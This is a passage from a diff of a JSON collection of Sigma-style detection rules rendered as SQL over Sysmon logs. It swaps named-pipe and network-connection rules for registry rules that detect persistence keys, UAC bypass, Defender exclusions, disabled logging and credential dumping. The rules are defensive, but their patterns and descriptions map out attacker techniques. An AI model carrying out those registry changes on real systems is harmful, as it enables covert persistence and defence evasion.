'-1[0-9]{3}\\\\Software\\\\Classes\\\\')))" ], - "filename": "pipe_created_susp_wmi_consumer_namedpipe.yml" + "filename": "registry_set_uac_bypass_sdclt.yml" }, { - "title": "PAExec Default Named Pipe", - "id": "f6451de4-df0a-41fa-8d72-b39f54a08db5", - "status": "test", - "description": "Detects PAExec default named pipe", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "title": "CrashControl CrashDump Disabled", + "id": "2ff692c2-4594-41ec-8fcb-46587de769e0", + "status": "experimental", + "description": "Detects disabling the CrashDump per registry (as used by HermeticWiper)", + "author": "Tobias Michalski (Nextron Systems)", "tags": [ - "attack.execution", - "attack.t1569.002" + "attack.t1564", + "attack.t1112" ], "falsepositives": [ - "Unknown" + "Legitimate disabling of crashdumps" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (EventID IN ('17', '18') AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND PipeName LIKE '\\\\PAExec%' ESCAPE '\\')" + "SELECT * FROM logs WHERE (EventID = '13' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND EventType = 'SetValue' AND TargetObject LIKE 
'%SYSTEM\\\\CurrentControlSet\\\\Control\\\\CrashControl%' ESCAPE '\\' AND Details = 'DWORD (0x00000000)')" ], - "filename": "pipe_created_paexec_default_pipe.yml" + "filename": "registry_set_crashdump_disabled.yml" }, { - "title": "CobaltStrike Named Pipe", - "id": "d5601f8c-b26f-4ab0-9035-69e11a8d4ad2", - "status": "test", - "description": "Detects the creation of a named pipe as used by CobaltStrike", - "author": "Florian Roth (Nextron Systems), Wojciech Lesicki", + "title": "Usage of Renamed Sysinternals Tools - RegistrySet", + "id": "8023f872-3f1d-4301-a384-801889917ab4", + "status": "experimental", + "description": "Detects non-sysinternals tools setting the \"accepteula\" key which normally is set on sysinternals tool execution", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.defense_evasion", - "attack.privilege_escalation", - "attack.t1055" + "attack.resource_development", + "attack.t1588.002" ], "falsepositives": [ - "Unknown" + "Unlikely" ], - "level": "critical", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID IN ('17', '18') AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((PipeName LIKE '%\\\\MSSE-%' ESCAPE '\\' AND PipeName LIKE '%-server%' ESCAPE '\\') OR PipeName LIKE '\\\\postex\\_%' ESCAPE '\\' OR PipeName LIKE '\\\\status\\_%' ESCAPE '\\' OR PipeName LIKE '\\\\msagent\\_%' ESCAPE '\\' OR PipeName LIKE '\\\\mojo\\_%' ESCAPE '\\' OR PipeName LIKE '\\\\interprocess\\_%' ESCAPE '\\' OR PipeName LIKE '\\\\samr\\_%' ESCAPE '\\' OR PipeName LIKE '\\\\netlogon\\_%' ESCAPE '\\' OR PipeName LIKE '\\\\srvsvc\\_%' ESCAPE '\\' OR PipeName LIKE '\\\\lsarpc\\_%' ESCAPE '\\' OR PipeName LIKE '\\\\wkssvc\\_%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '13' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (EventType = 'SetValue' AND (TargetObject LIKE '%\\\\PsExec%' ESCAPE '\\' OR TargetObject LIKE '%\\\\ProcDump%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Handle%' ESCAPE '\\' OR 
TargetObject LIKE '%\\\\LiveKd%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Process Explorer%' ESCAPE '\\' OR TargetObject LIKE '%\\\\PsLoglist%' ESCAPE '\\' OR TargetObject LIKE '%\\\\PsPasswd%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Active Directory Explorer%' ESCAPE '\\') AND TargetObject LIKE '%\\\\EulaAccepted' ESCAPE '\\') AND NOT ((Image LIKE '%\\\\PsExec.exe' ESCAPE '\\' OR Image LIKE '%\\\\PsExec64.exe' ESCAPE '\\' OR Image LIKE '%\\\\procdump.exe' ESCAPE '\\' OR Image LIKE '%\\\\procdump64.exe' ESCAPE '\\' OR Image LIKE '%\\\\handle.exe' ESCAPE '\\' OR Image LIKE '%\\\\handle64.exe' ESCAPE '\\' OR Image LIKE '%\\\\livekd.exe' ESCAPE '\\' OR Image LIKE '%\\\\livekd64.exe' ESCAPE '\\' OR Image LIKE '%\\\\procexp.exe' ESCAPE '\\' OR Image LIKE '%\\\\procexp64.exe' ESCAPE '\\' OR Image LIKE '%\\\\psloglist.exe' ESCAPE '\\' OR Image LIKE '%\\\\psloglist64.exe' ESCAPE '\\' OR Image LIKE '%\\\\pspasswd.exe' ESCAPE '\\' OR Image LIKE '%\\\\pspasswd64.exe' ESCAPE '\\' OR Image LIKE '%\\\\ADExplorer.exe' ESCAPE '\\' OR Image LIKE '%\\\\ADExplorer64.exe' ESCAPE '\\')))" ], - "filename": "pipe_created_mal_cobaltstrike.yml" + "filename": "registry_set_renamed_sysinternals_eula_accepted.yml" }, { - "title": "Alternate PowerShell Hosts Pipe", - "id": "58cb02d5-78ce-4692-b3e1-dce850aae41a", - "status": "test", - "description": "Detects alternate PowerShell hosts potentially bypassing detections looking for powershell.exe", - "author": "Roberto Rodriguez @Cyb3rWard0g, Tim Shelton", + "title": "Potential Credential Dumping Attempt Using New NetworkProvider - REG", + "id": "0442defa-b4a2-41c9-ae2c-ea7042fc4701", + "status": "experimental", + "description": "Detects when an attacker tries to add a new network provider in order to dump clear text credentials, similar to how the NPPSpy tool does it", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.execution", - "attack.t1059.001" + "attack.credential_access", + "attack.t1003" ], "falsepositives": [ - 
"Programs using PowerShell directly without invocation of a dedicated interpreter." + "Other legitimate network providers used and not filtred in this rule" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID IN ('17', '18') AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND PipeName LIKE '\\\\PSHost%' ESCAPE '\\' AND NOT (((Image LIKE '%\\\\powershell.exe' ESCAPE '\\' OR Image LIKE '%\\\\powershell\\_ise.exe' ESCAPE '\\' OR Image LIKE '%\\\\WINDOWS\\\\System32\\\\sdiagnhost.exe' ESCAPE '\\' OR Image LIKE '%\\\\WINDOWS\\\\System32\\\\wsmprovhost.exe' ESCAPE '\\' OR Image LIKE '%\\\\Windows\\\\system32\\\\dsac.exe' ESCAPE '\\' OR Image LIKE '%\\\\Windows\\\\system32\\\\wbem\\\\wmiprvse.exe' ESCAPE '\\' OR Image LIKE '%\\\\ForefrontActiveDirectoryConnector.exe' ESCAPE '\\' OR Image LIKE '%c:\\\\windows\\\\system32\\\\inetsrv\\\\w3wp.exe' ESCAPE '\\')) OR (Image = '') OR (Image LIKE '%:\\\\Program Files%' ESCAPE '\\' AND Image LIKE '%\\\\Microsoft SQL Server\\\\%' ESCAPE '\\' AND Image LIKE '%\\\\Tools\\\\Binn\\\\SQLPS.exe' ESCAPE '\\') OR ((Image LIKE 'C:\\\\Program Files\\\\Citrix\\\\%' ESCAPE '\\' OR Image LIKE 'C:\\\\Program Files\\\\Microsoft\\\\Exchange Server\\\\%' ESCAPE '\\')) OR ((Image LIKE 'C:\\\\Windows\\\\system32\\\\ServerManager.exe' ESCAPE '\\' OR Image LIKE 'C:\\\\Program Files\\\\PowerShell\\\\7\\\\pwsh.exe' ESCAPE '\\'))))" + "SELECT * FROM logs WHERE ((EventID = '13' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (EventType = 'SetValue' AND TargetObject LIKE '%\\\\System\\\\CurrentControlSet\\\\Services\\\\%' ESCAPE '\\' AND TargetObject LIKE '%\\\\NetworkProvider%' ESCAPE '\\') AND NOT (((TargetObject LIKE '%\\\\System\\\\CurrentControlSet\\\\Services\\\\WebClient\\\\NetworkProvider%' ESCAPE '\\' OR TargetObject LIKE '%\\\\System\\\\CurrentControlSet\\\\Services\\\\LanmanWorkstation\\\\NetworkProvider%' ESCAPE '\\' OR TargetObject LIKE '%\\\\System\\\\CurrentControlSet\\\\Services\\\\RDPNP\\\\NetworkProvider%' 
ESCAPE '\\')) OR (Image LIKE 'C:\\\\Windows\\\\System32\\\\poqexec.exe' ESCAPE '\\')))" ], - "filename": "pipe_created_alternate_powershell_hosts_pipe.yml" + "filename": "registry_set_new_network_provider.yml" }, { - "title": "Suspicious Network Connection Binary No CommandLine", - "id": "20384606-a124-4fec-acbb-8bd373728613", + "title": "Potential Persistence Via LSA Extensions", + "id": "41f6531d-af6e-4c6e-918f-b946f2b85a36", "status": "experimental", - "description": "Detects suspicious network connections made by a well-known Windows binary run with no command line parameters", - "author": "Florian Roth (Nextron Systems)", + "description": "Detects when an attacker modifies the \"REG_MULTI_SZ\" value named \"Extensions\" to include a custom DLL to achieve persistence via lsass.\nThe \"Extensions\" list contains filenames of DLLs being automatically loaded by lsass.exe. Each DLL has its InitializeLsaExtension() method called after loading.\n", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.defense_evasion" + "attack.persistence" ], "falsepositives": [ - "Unknown" + "Unlikely" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '3' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Initiated = 'true' AND (Image LIKE '%\\\\regsvr32.exe' ESCAPE '\\' OR Image LIKE '%\\\\rundll32.exe' ESCAPE '\\' OR Image LIKE '%\\\\dllhost.exe' ESCAPE '\\') AND (CommandLine LIKE '%\\\\regsvr32.exe' ESCAPE '\\' OR CommandLine LIKE '%\\\\rundll32.exe' ESCAPE '\\' OR CommandLine LIKE '%\\\\dllhost.exe' ESCAPE '\\')) AND NOT ((CommandLine = '') OR (CommandLine = '')))" + "SELECT * FROM logs WHERE (EventID = '13' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND EventType = 'SetValue' AND TargetObject LIKE '%\\\\SYSTEM\\\\CurrentControlSet\\\\Control\\\\LsaExtensionConfig\\\\LsaSrv\\\\Extensions%' ESCAPE '\\')" ], - "filename": "net_connection_win_susp_binary_no_cmdline.yml" + "filename": 
"registry_set_persistence_lsa_extension.yml" }, { - "title": "Wuauclt Network Connection", - "id": "c649a6c7-cd8c-4a78-9c04-000fc76df954", + "title": "New Application in AppCompat", + "id": "60936b49-fca0-4f32-993d-7415edcf9a5d", "status": "test", - "description": "Detects the use of the Windows Update Client binary (wuauclt.exe) to proxy execute code and making a network connections.\nOne could easily make the DLL spawn a new process and inject to it to proxy the network connection and bypass this rule.\n", + "description": "A General detection for a new application in AppCompat. This indicates an application executing for the first time on an endpoint.", "author": "Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research)", "tags": [ - "attack.defense_evasion", - "attack.t1218" + "attack.execution", + "attack.t1204.002" ], "falsepositives": [ - "Legitimate use of wuauclt.exe over the network." + "This rule is to explore new applications on an endpoint. False positives depends on the organization.", + "Newly setup system.", + "Legitimate installation of new application." 
], - "level": "medium", + "level": "informational", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '3' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND Image LIKE '%wuauclt%' ESCAPE '\\' AND NOT (((DestinationIp LIKE '20.184.%' ESCAPE '\\' OR DestinationIp LIKE '20.185.%' ESCAPE '\\' OR DestinationIp LIKE '20.186.%' ESCAPE '\\' OR DestinationIp LIKE '20.187.%' ESCAPE '\\' OR DestinationIp LIKE '20.188.%' ESCAPE '\\' OR DestinationIp LIKE '20.189.%' ESCAPE '\\' OR DestinationIp LIKE '20.190.%' ESCAPE '\\' OR DestinationIp LIKE '20.191.%' ESCAPE '\\' OR DestinationIp LIKE '23.79.%' ESCAPE '\\' OR DestinationIp LIKE '51.10.%' ESCAPE '\\' OR DestinationIp LIKE '51.103.%' ESCAPE '\\' OR DestinationIp LIKE '51.104.%' ESCAPE '\\' OR DestinationIp LIKE '51.105.%' ESCAPE '\\' OR DestinationIp LIKE '52.239.%' ESCAPE '\\')) OR (CommandLine LIKE '%\\\\UpdateDeploy.dll /ClassId %' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (EventID = '13' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND EventType = 'Setvalue' AND TargetObject LIKE '%\\\\AppCompatFlags\\\\Compatibility Assistant\\\\Store\\\\%' ESCAPE '\\')" ], - "filename": "net_connection_win_wuauclt_network_connection.yml" + "filename": "registry_set_new_application_appcompat.yml" }, { - "title": "Remote PowerShell Session (Network)", - "id": "c539afac-c12a-46ed-b1bd-5a5567c9f045", - "status": "test", - "description": "Detects remote PowerShell connections by monitoring network outbound connections to ports 5985 or 5986 from a non-network service account.", - "author": "Roberto Rodriguez @Cyb3rWard0g", + "title": "Change the Fax Dll", + "id": "9e3357ba-09d4-4fbd-a7c5-ad6386314513", + "status": "experimental", + "description": "Detect possible persistence using Fax DLL load when service restart", + "author": "frack113", "tags": [ - "attack.execution", - "attack.t1059.001", - "attack.lateral_movement", - "attack.t1021.006" + "attack.defense_evasion", + "attack.t1112" ], "falsepositives": [ - "Legitimate 
usage of remote PowerShell, e.g. remote administration and monitoring.", - "Network Service user name of a not-covered localization" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '3' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (DestinationPort IN ('5985', '5986') AND Initiated = 'true') AND NOT (((User LIKE '%NETWORK SERVICE%' ESCAPE '\\' OR User LIKE '%NETZWERKDIENST%' ESCAPE '\\' OR User LIKE '%SERVIZIO DI RETE%' ESCAPE '\\' OR User LIKE '%SERVICIO DE RED%' ESCAPE '\\') OR User LIKE '%SERVICE R%' ESCAPE '\\' AND User LIKE '%SEAU%' ESCAPE '\\' OR SourceIp LIKE '0:0:%' ESCAPE '\\' OR (Image LIKE 'C:\\\\Program Files\\\\Avast Software\\\\Avast\\\\AvastSvc.exe' ESCAPE '\\' OR Image LIKE 'C:\\\\Program Files (x86)\\\\Avast Software\\\\Avast\\\\AvastSvc.exe' ESCAPE '\\')) OR (SourceIp IN ('::1', '127.0.0.1') AND DestinationIp IN ('::1', '127.0.0.1'))))" + "SELECT * FROM logs WHERE ((EventID = '13' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (TargetObject LIKE '%\\\\Software\\\\Microsoft\\\\Fax\\\\Device Providers\\\\%' ESCAPE '\\' AND TargetObject LIKE '%\\\\ImageName%' ESCAPE '\\') AND NOT (Details LIKE '\\%systemroot\\%\\\\system32\\\\fxst30.dll' ESCAPE '\\'))" ], - "filename": "net_connection_win_remote_powershell_session_network.yml" + "filename": "registry_set_fax_dll_persistance.yml" }, { - "title": "HH.EXE Network Connections", - "id": "468a8cea-2920-4909-a593-0cbe1d96674a", + "title": "Potential Persistence Via MyComputer Registry Keys", + "id": "8fbe98a8-8f9d-44f8-aa71-8c572e29ef06", "status": "experimental", - "description": "Detects network connections made by the \"hh.exe\" process, which could indicate the execution/download of remotely hosted .chm files", + "description": "Detects modification to the \"Default\" value of the \"MyComputer\" key and subkeys to point to a custom binary that will be launched whenever the associated action is executed (see reference section for example)", 
"author": "Nasreddine Bencherchali (Nextron Systems)", + "tags": [ + "attack.persistence" + ], + "falsepositives": [ + "Unlikely but if you experience FPs add specific processes and locations you would like to monitor for" + ], + "level": "high", + "rule": [ + "SELECT * FROM logs WHERE (EventID = '13' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND EventType = 'SetValue' AND TargetObject LIKE '%\\\\SOFTWARE\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Explorer\\\\MyComputer%' ESCAPE '\\' AND TargetObject LIKE '%(Default)' ESCAPE '\\')" + ], + "filename": "registry_set_persistence_mycomputer.yml" + }, + { + "title": "Disabled Windows Defender Eventlog", + "id": "fcddca7c-b9c0-4ddf-98da-e1e2d18b0157", + "status": "experimental", + "description": "Detects the disabling of the Windows Defender eventlog as seen in relation to Lockbit 3.0 infections", + "author": "Florian Roth (Nextron Systems)", "tags": [ "attack.defense_evasion", - "attack.t1218.001" + "attack.t1562.001" ], "falsepositives": [ - "Unknown" + "Other Antivirus software installations could cause Windows to disable that eventlog (unknown)" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '3' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND Image LIKE '%\\\\hh.exe' ESCAPE '\\' AND Initiated = 'true' AND DestinationPort IN ('80', '443', '135', '445'))" + "SELECT * FROM logs WHERE (EventID = '13' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND EventType = 'SetValue' AND TargetObject LIKE '%\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\WINEVT\\\\Channels\\\\Microsoft-Windows-Windows Defender/Operational\\\\Enabled%' ESCAPE '\\' AND Details = 'DWORD (0x00000000)')" ], - "filename": "net_connection_win_hh.yml" + "filename": "registry_set_disabled_microsoft_defender_eventlog.yml" }, { - "title": "Suspicious Outbound SMTP Connections", - "id": "9976fa64-2804-423c-8a5b-646ade840773", - "status": "experimental", - "description": "Adversaries may 
steal data by exfiltrating it over an un-encrypted network protocol other than that of the existing command and control channel.\nThe data may also be sent to an alternate network location from the main command and control server.\n", - "author": "frack113", + "title": "Windows Defender Exclusions Added - Registry", + "id": "a982fc9c-6333-4ffb-a51d-addb04e8b529", + "status": "test", + "description": "Detects the Setting of Windows Defender Exclusions", + "author": "Christian Burkard (Nextron Systems)", "tags": [ - "attack.exfiltration", - "attack.t1048.003" + "attack.defense_evasion", + "attack.t1562.001" ], "falsepositives": [ - "Other SMTP tools" + "Administrator actions" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '3' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (DestinationPort IN ('25', '587', '465', '2525') AND Initiated = 'true') AND NOT (((Image LIKE '%\\\\thunderbird.exe' ESCAPE '\\' OR Image LIKE '%\\\\outlook.exe' ESCAPE '\\')) OR (Image LIKE 'C:\\\\Program Files\\\\Microsoft\\\\Exchange Server\\\\%' ESCAPE '\\') OR (Image LIKE 'C:\\\\Program Files\\\\WindowsApps\\\\microsoft.windowscommunicationsapps\\_%' ESCAPE '\\' AND Image LIKE '%\\\\HxTsr.exe' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (EventID = '13' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND EventType = 'SetValue' AND TargetObject LIKE '%\\\\Microsoft\\\\Windows Defender\\\\Exclusions%' ESCAPE '\\')" ], - "filename": "net_connection_win_susp_outbound_smtp_connections.yml" + "filename": "registry_set_defender_exclusions.yml" }, { - "title": "Download a File with IMEWDBLD.exe", - "id": "8d7e392e-9b28-49e1-831d-5949c6281228", - "status": "test", - "description": "Use IMEWDBLD.exe (built-in to windows) to download a file", + "title": "Lolbas OneDriveStandaloneUpdater.exe Proxy Download", + "id": "3aff0be0-7802-4a7e-a4fa-c60c74bc5e1d", + "status": "experimental", + "description": "Detects setting a custom URL for OneDriveStandaloneUpdater.exe to 
download a file from the Internet without executing any\nanomalous executables with suspicious arguments. The downloaded file will be in C:\\Users\\redacted\\AppData\\Local\\Microsoft\\OneDrive\\StandaloneUpdaterreSignInSettingsConfig.json\n", "author": "frack113", "tags": [ "attack.command_and_control", "attack.t1105" ], "falsepositives": [ - "Legitimate script" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '3' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND Initiated = 'true' AND Image LIKE '%\\\\IMEWDBLD.exe' ESCAPE '\\')" + "SELECT * FROM logs WHERE (EventID = '13' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND EventType = 'SetValue' AND TargetObject LIKE '%\\\\SOFTWARE\\\\Microsoft\\\\OneDrive\\\\UpdateOfficeConfig\\\\UpdateRingSettingURLFromOC%' ESCAPE '\\')" ], - "filename": "net_connection_win_imewdbld.yml" + "filename": "registry_set_lolbin_onedrivestandaloneupdater.yml" }, { - "title": "Cmstp Making Network Connection", - "id": "efafe0bf-4238-479e-af8f-797bd3490d2d", + "title": "Potential Registry Persistence Attempt Via DbgManagedDebugger", + "id": "9827ae57-3802-418f-994b-d5ecf5cd974b", "status": "experimental", - "description": "Detects suspicious network connection by Cmstp", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "description": "Detects the addition of the \"Debugger\" value to the \"DbgManagedDebugger\" key in order to achieve persistence. Which will get invoked when an application crashes", + "author": "frack113", "tags": [ - "attack.defense_evasion", - "attack.t1218.003" + "attack.persistence", + "attack.t1574" ], "falsepositives": [ - "Unknown" + "Legitimate use of the key to setup a debugger. 
Which is often the case on developers machines" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (EventID = '3' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND Image LIKE '%\\\\cmstp.exe' ESCAPE '\\' AND Initiated = 'true')" + "SELECT * FROM logs WHERE ((EventID = '13' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (EventType = 'SetValue' AND TargetObject LIKE '%\\\\Microsoft\\\\.NETFramework\\\\DbgManagedDebugger' ESCAPE '\\') AND NOT (Details LIKE '\"C:\\\\Windows\\\\system32\\\\vsjitdebugger.exe\" PID \\%d APPDOM \\%d EXTEXT \"\\%s\" EVTHDL \\%d' ESCAPE '\\'))" ], - "filename": "net_connection_win_susp_cmstp.yml" + "filename": "registry_set_dbgmanageddebugger_persistence.yml" }, { - "title": "Msiexec Initiated Connection", - "id": "8e5e38e4-5350-4c0b-895a-e872ce0dd54f", - "status": "test", - "description": "Adversaries may abuse msiexec.exe to proxy execution of malicious payloads.\nMsiexec.exe is the command-line utility for the Windows Installer and is thus commonly associated with executing installation packages (.msi)\n", + "title": "Modification of IE Registry Settings", + "id": "d88d0ab2-e696-4d40-a2ed-9790064e66b3", + "status": "experimental", + "description": "Detects modification of the registry settings used for Internet Explorer and other Windows components that use these settings. 
An attacker can abuse this registry key to add a domain to the trusted sites Zone or insert javascript for persistence", "author": "frack113", "tags": [ "attack.defense_evasion", - "attack.t1218.007" + "attack.t1112" ], "falsepositives": [ - "Legitimate msiexec over networks" + "Unknown" ], - "level": "medium", + "level": "low", "rule": [ - "SELECT * FROM logs WHERE (EventID = '3' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND Initiated = 'true' AND Image LIKE '%\\\\msiexec.exe' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '13' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (EventType = 'SetValue' AND TargetObject LIKE '%\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Internet Settings%' ESCAPE '\\') AND NOT ((Details LIKE 'DWORD%' ESCAPE '\\') OR (Details IN ('Cookie:', 'Visited:', '(Empty)')) OR ((TargetObject LIKE '%\\\\Cache%' ESCAPE '\\' OR TargetObject LIKE '%\\\\ZoneMap%' ESCAPE '\\' OR TargetObject LIKE '%\\\\WpadDecision%' ESCAPE '\\')) OR (Details = 'Binary Data') OR (TargetObject LIKE '%\\\\Accepted Documents\\\\%' ESCAPE '\\')))" ], - "filename": "net_connection_win_msiexec.yml" + "filename": "registry_set_persistence_ie.yml" }, { - "title": "Suspicious Dropbox API Usage", - "id": "25eabf56-22f0-4915-a1ed-056b8dae0a68", + "title": "Potential Persistence Via App Paths Default Property", + "id": "707e097c-e20f-4f67-8807-1f72ff4500d6", "status": "experimental", - "description": "Detects an executable that isn't dropbox but communicates with the Dropbox API", - "author": "Florian Roth (Nextron Systems)", + "description": "Detects changes to the \"Default\" property for keys located in the \\Software\\Microsoft\\Windows\\CurrentVersion\\App Paths\\ registry. 
Which might be used as a method of persistence\nThe entries found under App Paths are used primarily for the following purposes.\nFirst, to map an application's executable file name to that file's fully qualified path.\nSecond, to pre-pend information to the PATH environment variable on a per-application, per-process basis.\n", + "author": "Nasreddine Bencherchali (Nextron Systems)", + "tags": [ + "attack.persistence", + "attack.t1546.012" + ], "falsepositives": [ - "Legitimate use of the API with a tool that the author wasn't aware of" + "Legitimate applications registering their binary from on of the suspicious locations mentioned above (tune it)" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '3' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Initiated = 'true' AND (DestinationHostname LIKE '%api.dropboxapi.com' ESCAPE '\\' OR DestinationHostname LIKE '%content.dropboxapi.com' ESCAPE '\\')) AND NOT (Image LIKE '%\\\\Dropbox%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '13' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND EventType = 'SetValue' AND TargetObject LIKE '%\\\\SOFTWARE\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\App Paths%' ESCAPE '\\' AND (TargetObject LIKE '%(Default)' ESCAPE '\\' OR TargetObject LIKE '%Path' ESCAPE '\\') AND (Details LIKE '%\\\\Users\\\\Public%' ESCAPE '\\' OR Details LIKE '%\\\\AppData\\\\Local\\\\Temp\\\\%' ESCAPE '\\' OR Details LIKE '%\\\\Windows\\\\Temp\\\\%' ESCAPE '\\' OR Details LIKE '%\\\\Desktop\\\\%' ESCAPE '\\' OR Details LIKE '%\\\\Downloads\\\\%' ESCAPE '\\' OR Details LIKE '%\\%temp\\%%' ESCAPE '\\' OR Details LIKE '%\\%tmp\\%%' ESCAPE '\\' OR Details LIKE '%iex%' ESCAPE '\\' OR Details LIKE '%Invoke-%' ESCAPE '\\' OR Details LIKE '%rundll32%' ESCAPE '\\' OR Details LIKE '%regsvr32%' ESCAPE '\\' OR Details LIKE '%mshta%' ESCAPE '\\' OR Details LIKE '%cscript%' ESCAPE '\\' OR Details LIKE '%wscript%' ESCAPE '\\' OR Details LIKE '%.bat%' ESCAPE '\\' OR Details LIKE 
'%.hta%' ESCAPE '\\' OR Details LIKE '%.dll%' ESCAPE '\\' OR Details LIKE '%.ps1%' ESCAPE '\\'))" ], - "filename": "net_connection_win_susp_dropbox_api.yml" + "filename": "registry_set_persistence_app_paths.yml" }, { - "title": "RDP to HTTP or HTTPS Target Ports", - "id": "b1e5da3b-ca8e-4adf-915c-9921f3d85481", + "title": "Potential AutoLogger Sessions Tampering", + "id": "f37b4bce-49d0-4087-9f5b-58bffda77316", "status": "experimental", - "description": "Detects svchost hosting RDP termsvcs communicating to target systems on TCP port 80 or 443", - "author": "Florian Roth (Nextron Systems)", + "description": "Detects tampering with autologger trace sessions which is a technique used by attackers to disable logging", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.command_and_control", - "attack.t1572", - "attack.lateral_movement", - "attack.t1021.001", - "car.2013-07-002" + "attack.defense_evasion" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '3' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND Image LIKE '%\\\\svchost.exe' ESCAPE '\\' AND Initiated = 'true' AND SourcePort = '3389' AND DestinationPort IN ('80', '443'))" + "SELECT * FROM logs WHERE ((EventID = '13' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (EventType = 'SetValue' AND TargetObject LIKE '%\\\\System\\\\CurrentControlSet\\\\Control\\\\WMI\\\\Autologger\\\\%' ESCAPE '\\' AND (TargetObject LIKE '%\\\\EventLog-%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Defender%' ESCAPE '\\') AND (TargetObject LIKE '%\\\\Enable' ESCAPE '\\' OR TargetObject LIKE '%\\\\Start' ESCAPE '\\') AND Details = 'DWORD (0x00000000)') AND NOT ((Image LIKE 'C:\\\\Windows\\\\system32\\\\wevtutil.exe' ESCAPE '\\')))" ], - "filename": "net_connection_win_rdp_to_http.yml" + "filename": "registry_set_disable_autologger_sessions.yml" }, { - "title": "Microsoft Binary Github Communication", - "id": 
"635dbb88-67b3-4b41-9ea5-a3af2dd88153", + "title": "Registry Persistence via Explorer Run Key", + "id": "b7916c2a-fa2f-4795-9477-32b731f70f11", "status": "test", - "description": "Detects an executable in the Windows folder accessing github.com", - "author": "Michael Haag (idea), Florian Roth (Nextron Systems)", + "description": "Detects a possible persistence mechanism using RUN key for Windows Explorer and pointing to a suspicious folder", + "author": "Florian Roth (Nextron Systems), oscd.community", "tags": [ - "attack.lateral_movement", - "attack.t1105", - "attack.exfiltration", - "attack.t1567.001" + "attack.persistence", + "attack.t1547.001" ], "falsepositives": [ - "Unknown", - "@subTee in your network" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '3' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND Initiated = 'true' AND (DestinationHostname LIKE '%.github.com' ESCAPE '\\' OR DestinationHostname LIKE '%.githubusercontent.com' ESCAPE '\\') AND Image LIKE 'C:\\\\Windows\\\\%' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '13' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (EventType = 'SetValue' AND TargetObject LIKE '%\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Policies\\\\Explorer\\\\Run' ESCAPE '\\') AND ((Details LIKE 'C:\\\\Windows\\\\Temp\\\\%' ESCAPE '\\' OR Details LIKE 'C:\\\\ProgramData\\\\%' ESCAPE '\\' OR Details LIKE 'C:\\\\$Recycle.bin\\\\%' ESCAPE '\\' OR Details LIKE 'C:\\\\Temp\\\\%' ESCAPE '\\' OR Details LIKE 'C:\\\\Users\\\\Public\\\\%' ESCAPE '\\' OR Details LIKE 'C:\\\\Users\\\\Default\\\\%' ESCAPE '\\') OR Details LIKE '%\\\\AppData\\\\%' ESCAPE '\\'))" ], - "filename": "net_connection_win_binary_github_com.yml" + "filename": "registry_set_susp_reg_persist_explorer_run.yml" }, { - "title": "Microsoft Sync Center Suspicious Network Connections", - "id": "9f2cc74d-78af-4eb2-bb64-9cd1d292b87b", + "title": "Disable UAC Using Registry", + "id": 
